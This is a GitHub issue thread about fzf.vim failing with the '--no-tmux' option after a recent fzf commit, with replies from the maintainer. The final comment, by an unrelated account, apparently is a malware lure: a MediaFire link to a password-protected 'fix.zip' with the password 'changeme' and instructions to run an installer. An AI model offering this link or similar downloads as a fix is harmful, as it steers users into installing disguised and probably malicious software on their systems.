### ISSUE TITLE
vim fzf doesn't work with the latest vim junegunn/fzf

### ISSUE THREAD

**Issue by yangning1368** [junegunn/fzf#3980]
### Checklist

- [X] I have read through the manual page (`man fzf`)
- [X] I have searched through the existing issues
- [X] For bug reports, I have checked if the bug is reproducible in the latest version of fzf

### Output of `fzf --version`

0.29 (devel)

### OS

- [X] Linux
- [ ] macOS
- [ ] Windows
- [ ] Etc.

### Shell

- [X] bash
- [ ] zsh
- [ ] fish

### Problem / Steps to reproduce

vimrc fzf config
Plug 'junegunn/fzf'
Plug 'junegunn/fzf.vim'

I update the fzf and fzf.vim to the latest version. I meet an error when i want to do search process in vim.

Error running command cat '/tmp/vSvIsRf/6'|'fzf'  --border    '+m' '-x' '--tiebreak=index' '--header-lines=1' '--ansi' '-d' '\t' '--wi...g/.vim/plugged/fzf.vim/bin/preview.sh'\'' {1}' '--bind' 'ctrl-/:toggle-preview' --expect=ctrl-e --no-height --no-tmux

Narrow down root cause. I find the below commit imports the error.  after this commit is imported. vim doesn't work well. And if i comment "--no-tmux" option. It'll be ok.

commit 83b603390683d49ff75b72d142b4dba4b5186d73
Author: Junegunn Choi <junegunn.c@gmail.com>
Date:   Fri May 10 01:40:56 2024 +0900

    Add --tmux option to replace fzf-tmux script

**Comment by junegunn** [comment]
I'm going to have to update https://github.com/junegunn/fzf.vim/blob/279e1ec068f526e985ee7e3f62a71f083bbe0196/autoload/fzf/vim.vim#L97

**Comment by junegunn** [comment]
Once you update the plugins and run a command, you will be prompted to download the latest version of fzf.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
